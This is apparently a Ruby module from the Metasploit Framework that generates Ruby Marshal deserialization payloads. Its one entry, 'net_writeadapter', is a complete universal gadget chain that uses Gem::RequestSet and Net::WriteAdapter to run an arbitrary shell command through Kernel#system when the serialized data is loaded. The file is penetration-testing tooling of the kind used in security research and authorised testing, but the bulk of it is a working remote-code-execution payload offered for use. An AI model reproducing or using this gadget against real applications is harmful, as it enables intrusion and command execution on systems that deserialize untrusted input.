Heyder Andrade
35 lines
1.3 KiB
Ruby
35 lines
1.3 KiB
Ruby
# -*- coding: binary -*-
|
|
|
|
# Ruby deserialization Utility
|
|
module Msf
|
|
module Util
|
|
# Ruby deserialization class
|
|
class RubyDeserialization
|
|
# That could be in the future a list of payloads used to exploit the Ruby deserialization vulnerability.
|
|
PAYLOADS = {
|
|
# https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.html
|
|
net_writeadapter: proc do |command|
|
|
"\x04\b[\bc\x15Gem::SpecFetcherc\x13Gem::InstallerU:\x15Gem::Requirement" \
|
|
"[\x06o:\x1CGem::Package::TarReader\x06:\b@ioo:\x14Net::BufferedIO\a;\ao:" \
|
|
"#Gem::Package::TarReader::Entry\a:\n@readi\x00:\f@headerI#{Marshal.dump(Rex::Text.rand_text_alphanumeric(12..20))[2..-1]}" \
|
|
"\x06:\x06ET:\x12@debug_outputo:\x16Net::WriteAdapter\a:\f@socketo:\x14" \
|
|
"Gem::RequestSet\a:\n@setso;\x0E\a;\x0Fm\vKernel:\x0F@method_id:\vsystem:\r" \
|
|
"@git_setI#{Marshal.dump(command)[2..-1]}\x06;\fT;\x12:\fresolve"
|
|
end
|
|
}
|
|
|
|
def self.payload(payload_name, command = nil)
|
|
|
|
raise ArgumentError, "#{payload_name} payload not found in payloads" unless payload_names.include? payload_name.to_sym
|
|
|
|
PAYLOADS[payload_name.to_sym].call(command)
|
|
end
|
|
|
|
def self.payload_names
|
|
PAYLOADS.keys
|
|
end
|
|
|
|
end
|
|
end
|
|
end
|